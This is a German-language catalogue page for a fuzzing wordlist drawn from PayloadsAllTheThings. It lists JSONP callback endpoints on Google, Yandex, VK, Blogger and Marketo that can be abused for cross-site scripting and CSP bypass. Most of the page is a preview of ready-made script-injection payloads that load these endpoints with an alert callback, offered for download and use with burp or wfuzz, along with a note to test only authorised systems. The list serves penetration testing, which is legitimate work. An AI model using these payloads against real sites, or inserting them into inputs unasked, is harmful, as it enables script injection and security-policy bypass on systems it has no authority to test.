Skip to content
cyberwordlists
Fuzzing5.7 KB

JSONP Endpoints for XSS/CORS (PayloadsAllTheThings)

Reale JSONP-Callback-Endpunkte (Google, Yandex, VK usw.), die für XSS über gewhitelistete Domains, CORS-/CSP-Umgehung und Smuggling von Skriptquellen missbraucht werden können.

Quelle ansehen
Größe
5.7 KB
Kategorie
Fuzzing
Quelle
swisskyrepo/PayloadsAllTheThings
Lizenz
MIT
Empfohlene Tools
burpwfuzz

Vorschau

Die ersten 15 Einträge. Lade die vollständige Liste (5.7 KB) herunter oder kopiere sie über die Schaltflächen oben.

>head jsonp-endpoints-patt.txt5.7 KB
#Google.com:
"><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
"><script+src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
"><script+src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
#Blogger.com:
"><script+src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
#Yandex:
"><script+src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
"><script+src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script>
#VK.com:
"><script+src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script>
#Marketo.com
"><script+src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
"><script+src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>

Reale JSONP-Callback-Endpunkte (Google, Yandex, VK usw.), die für XSS über gewhitelistete Domains, CORS-/CSP-Umgehung und Smuggling von Skriptquellen missbraucht werden können.

Diese Liste ist auf Input-Fuzzing und Schwachstellen-Discovery ausgerichtet. Sie umfasst etwa 5.7 KB und harmoniert gut mit Tools wie burp, wfuzz. Wähle die kleinste Liste, die zu deinem Einsatz passt: Kürzere Listen sind schneller und unauffälliger für Online- Angriffe, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger ins Gewicht fällt.

Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in die Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt aus ihrer ursprünglichen Quelle auf GitHub bereitgestellt.

Bezogen von swisskyrepo/PayloadsAllTheThings und vertrieben unter MIT. Verwende Wortlisten ausschließlich gegen Systeme, für deren Test du ausdrücklich autorisiert bist.